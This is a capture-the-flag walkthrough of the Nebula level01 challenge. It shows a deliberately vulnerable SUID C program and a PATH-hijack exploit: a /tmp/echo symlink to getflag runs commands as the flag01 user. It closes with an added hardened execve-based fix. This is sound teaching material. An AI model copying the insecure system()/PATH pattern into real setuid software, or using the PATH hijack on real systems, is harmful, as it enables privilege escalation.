
There is a vulnerability in the below program that allows arbitrary programs to be executed, can you find it? To do this level, log in as the level01 account with the password level01. Files for this level can be found in /home/flag01.

Source code

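#define _GNU_SOURCE /* needed for setresgid()/setresuid() */
#include <stdlib.h>
#include <unistd.h>
#include <string.h>
#include <sys/types.h>
#include <stdio.h>

int main(int argc, char **argv, char **envp)
{
  gid_t gid;
  uid_t uid;
  gid = getegid();
  uid = geteuid();

  /* keep the effective (SUID) ids for everything that follows */
  setresgid(gid, gid, gid);
  setresuid(uid, uid, uid);

  /* env looks "echo" up in the caller's PATH */
  system("/usr/bin/env echo and now what?");
}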


Straight after connecting, we go to the flag01 account's home folder.

level01@nebula:~$ cd /home/flag01/
level01@nebula:/home/flag01$ ls -al
total 13
drwxr-x--- 2 flag01 level01   92 Nov 20  2011 .
drwxr-xr-x 1 root   root      80 Aug 27  2012 ..
-rw-r--r-- 1 flag01 flag01   220 May 18  2011 .bash_logout
-rw-r--r-- 1 flag01 flag01  3353 May 18  2011 .bashrc
-rw-r--r-- 1 flag01 flag01   675 May 18  2011 .profile
-rwsr-x--- 1 flag01 level01 7322 Nov 20  2011 flag01

Here we can see the vulnerable SUID application, “flag01”, with permissions -rwsr-x---. Let’s execute it!

level01@nebula:/home/flag01$ ./flag01
and now what?

Perfect! Let’s observe something on this line:

system("/usr/bin/env echo and now what?");

As you can see, the C statement above runs a system command, “echo”, through /usr/bin/env, which looks echo up in the directories listed in PATH. Is echo really echo in Linux? Yeahhh, until you change it (actually, until you make a link from a command named echo to your other command). Let’s finish this!

level01@nebula:/home/flag01$ PATH=/tmp:$PATH
level01@nebula:/home/flag01$ ln -s /bin/getflag /tmp/echo
level01@nebula:/home/flag01$ ./flag01
You have successfully executed getflag on a target account

Fun? Here is the science behind my actions.
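The fix for this bug is to stop resolving echo through a PATH the caller controls. The block below is an added example, not part of the original write-up or the level's source: it replaces the system() call with execve() on an absolute path and a fixed environment. The function name run_echo_hardened and the /bin/echo location are assumptions.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/wait.h>
#include <unistd.h>

/* Hypothetical helper (not from the level's source): run echo with no shell
 * and no PATH search. /bin/echo and the fixed PATH value are assumptions.
 * Copies the child's stdout into buf; returns its exit status, -1 on error. */
int run_echo_hardened(char *buf, size_t len)
{
    char *const child_argv[] = { "echo", "and now what?", NULL };
    char *const child_envp[] = { "PATH=/usr/bin:/bin", NULL }; /* caller env dropped */
    int fds[2], status;
    size_t total = 0;
    ssize_t n;
    if (len == 0 || pipe(fds) != 0)
        return -1;
    pid_t pid = fork();
    if (pid < 0) {
        close(fds[0]); close(fds[1]);
        return -1;
    }
    if (pid == 0) {                              /* child */
        dup2(fds[1], STDOUT_FILENO);
        close(fds[0]); close(fds[1]);
        execve("/bin/echo", child_argv, child_envp); /* exact file, no lookup */
        _exit(127);                              /* exec failed */
    }
    close(fds[1]);                               /* parent: collect output */
    while (total < len - 1 &&
           (n = read(fds[0], buf + total, len - 1 - total)) > 0)
        total += (size_t)n;
    buf[total] = '\0';
    close(fds[0]);
    if (waitpid(pid, &status, 0) < 0)
        return -1;
    return WIFEXITED(status) ? WEXITSTATUS(status) : -1;
}

int main(void)
{
    char out[64];
    setenv("PATH", "/tmp", 1);  /* constructed: caller-controlled PATH, as in the level */
    if (run_echo_hardened(out, sizeof out) != 0) return 1;
    return fputs(out, stdout) < 0;
}
```

Because execve() is given the full path and its own envp, the PATH value set by the caller never takes part in choosing which binary runs.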